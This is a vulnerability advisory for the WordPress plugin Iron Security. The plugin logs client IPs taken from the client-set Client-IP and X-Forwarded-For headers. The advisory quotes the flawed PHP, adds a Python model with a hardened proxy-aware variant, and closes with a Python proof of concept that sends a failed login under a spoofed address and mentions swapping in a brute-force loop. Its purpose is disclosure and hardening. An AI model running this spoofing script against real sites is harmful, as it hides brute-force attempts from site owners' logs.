# Wordpress Plugin Iron Security - IP Spoofing
# Exploit Author: bRpsd | cy[at]live.no
# Date: March 20, 2025
# Product: https://wordpress.org/plugins/iron-security/
# Version: 2.2.3 and below
# CVE : N/A
Summary:
Iron Security is a WordPress security plugin built to secure and harden a website with essential protection features. Whether you are a blogger, business owner, or developer, it aims to keep the site safe from attacks and unauthorized access, with a user-friendly interface and tools such as a custom login URL and HTTP security headers.
The plugin logs successful and failed login attempts, along with other actions made by users, into a log table in the database; the logged data includes the client IP address. However, the IP is derived with weak logic that prefers client-supplied HTTP headers, so an attacker can evade attribution: the log records a spoofed address rather than the real source.
PHP function logic:
==========================================================================================
private static function get_client_ip() {
    $ip = '0.0.0.0';
    // Check for shared internet/ISP IP
    // (Client-IP is a plain request header; any client can set it)
    if (!empty($_SERVER['HTTP_CLIENT_IP']) && self::validate_ip($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    }
    // Check for IPs passing through proxies
    // (X-Forwarded-For is also client-controlled; the first syntactically valid entry wins)
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // Check if multiple IPs
        $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        foreach ($ips as $ip_address) {
            $ip_address = trim($ip_address);
            if (self::validate_ip($ip_address)) {
                $ip = $ip_address;
                break;
            }
        }
    }
    // Check for the remote address
    // (only reached when both headers above are absent, because of the elseif chain)
    elseif (!empty($_SERVER['REMOTE_ADDR']) && self::validate_ip($_SERVER['REMOTE_ADDR'])) {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}
==========================================================================================
Risk:
The plugin retrieves the client IP from untrusted request headers such as X-Forwarded-For and Client-IP, whose values any client can set, and only falls back to REMOTE_ADDR (the actual TCP peer) when both headers are absent. An attacker can therefore choose the address that gets logged and hide the true source of malicious traffic. Below is a simple Python example that performs a failed login attempt with a spoofed IP; the attempt is logged in the database under the spoofed address because the plugin performs no trust check on these headers and uses user-supplied HTTP headers as its primary source of the client IP.
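To make the trust problem concrete, here is a Python model of the PHP function shown above next to a hardened variant. This is an added example, not the plugin's code and not part of the original advisory; TRUSTED_PROXIES and the sample $_SERVER dictionaries are constructed assumptions. The vulnerable model reproduces the plugin's ordering exactly, which also exposes a second quirk of the elseif chain: a non-IP X-Forwarded-For value makes the function return 0.0.0.0 even though REMOTE_ADDR is present. The hardened version starts from REMOTE_ADDR and only unwraps X-Forwarded-For hops that a known reverse proxy appended, walking from the right.

```python
import ipaddress

# Constructed assumption: the one reverse proxy this site actually sits behind.
# A site served directly (no proxy) would leave this set empty.
TRUSTED_PROXIES = {ipaddress.ip_network("10.0.0.5/32")}


def validate_ip(value):
    """Syntactic IP check, standing in for the plugin's self::validate_ip()."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def get_client_ip_vulnerable(server):
    """Python model of the plugin's get_client_ip(): headers win over REMOTE_ADDR."""
    ip = "0.0.0.0"
    client_ip = server.get("HTTP_CLIENT_IP", "")
    xff = server.get("HTTP_X_FORWARDED_FOR", "")
    remote = server.get("REMOTE_ADDR", "")
    if client_ip and validate_ip(client_ip):
        ip = client_ip
    elif xff:
        # first syntactically valid entry wins; if none is valid, ip stays 0.0.0.0
        for candidate in xff.split(","):
            candidate = candidate.strip()
            if validate_ip(candidate):
                ip = candidate
                break
    elif remote and validate_ip(remote):
        ip = remote
    return ip


def get_client_ip_hardened(server, trusted_proxies=TRUSTED_PROXIES):
    """Start from the TCP peer; trust X-Forwarded-For only as far as known proxies go."""
    remote = server.get("REMOTE_ADDR", "")
    if not validate_ip(remote):
        return "0.0.0.0"
    peer = ipaddress.ip_address(remote)
    if not any(peer in net for net in trusted_proxies):
        # Direct connection: every header is attacker-controlled, so ignore them all.
        return remote
    hops = [h.strip() for h in server.get("HTTP_X_FORWARDED_FOR", "").split(",") if h.strip()]
    # Walk from the right (the hop closest to us) leftwards, skipping our own proxies.
    # The first hop that is not a trusted proxy is the client the proxy saw.
    for hop in reversed(hops):
        if not validate_ip(hop):
            return remote
        if any(ipaddress.ip_address(hop) in net for net in trusted_proxies):
            continue
        return hop
    return remote


# Constructed sample requests (not captured traffic). 203.0.113.7 plays the attacker.
SAMPLES = {
    "direct, spoofed headers": {
        "REMOTE_ADDR": "203.0.113.7",
        "HTTP_X_FORWARDED_FOR": "1.1.1.1",
        "HTTP_CLIENT_IP": "1.1.1.1",
    },
    "behind trusted proxy, attacker prepends XFF": {
        "REMOTE_ADDR": "10.0.0.5",
        "HTTP_X_FORWARDED_FOR": "1.1.1.1, 203.0.113.7",
    },
    "direct, junk XFF": {
        "REMOTE_ADDR": "203.0.113.7",
        "HTTP_X_FORWARDED_FOR": "not-an-ip",
    },
    "direct, no headers": {"REMOTE_ADDR": "203.0.113.7"},
}


def compare(samples=SAMPLES):
    """Return {label: (vulnerable_result, hardened_result)} for each sample request."""
    return {
        label: (get_client_ip_vulnerable(s), get_client_ip_hardened(s))
        for label, s in samples.items()
    }


if __name__ == "__main__":
    for label, (vuln, hard) in compare().items():
        print(f"{label:45s} vulnerable={vuln:15s} hardened={hard}")
```

In the hardened variant the proxy list is the whole point: without it there is no way to tell a forwarded hop from a forged one, which is why a generic "check headers first" helper can never be made safe by adding more header names.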
=======
POC
=======
import requests

# Target URL for login [can be other functions that get logged as well]
url = "http://localhost/wordpress/wp-login.php"

# Spoofed IP address
spoofed_ip = "1.1.1.1"

# In this example we use a failed login; in a real scenario a brute force loop can go here
username = "test"
password = "test"

# Headers with spoofed IP (the plugin reads both as $_SERVER['HTTP_CLIENT_IP'] and
# $_SERVER['HTTP_X_FORWARDED_FOR'] and trusts them before REMOTE_ADDR)
headers = {
    "User-Agent": "Mozilla/5.0",
    "X-Forwarded-For": spoofed_ip,
    "Client-IP": spoofed_ip,
}

# Login data (same fields the stock wp-login.php form submits)
data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1",
}

# Send the login request
response = requests.post(url, headers=headers, data=data)

# Check the response: a failed attempt returns the login form again with a "login_error" block;
# the plugin's log table should now show this attempt under 1.1.1.1 rather than the real address
print("Status Code:", response.status_code)
print("Login failed:", "login_error" in response.text)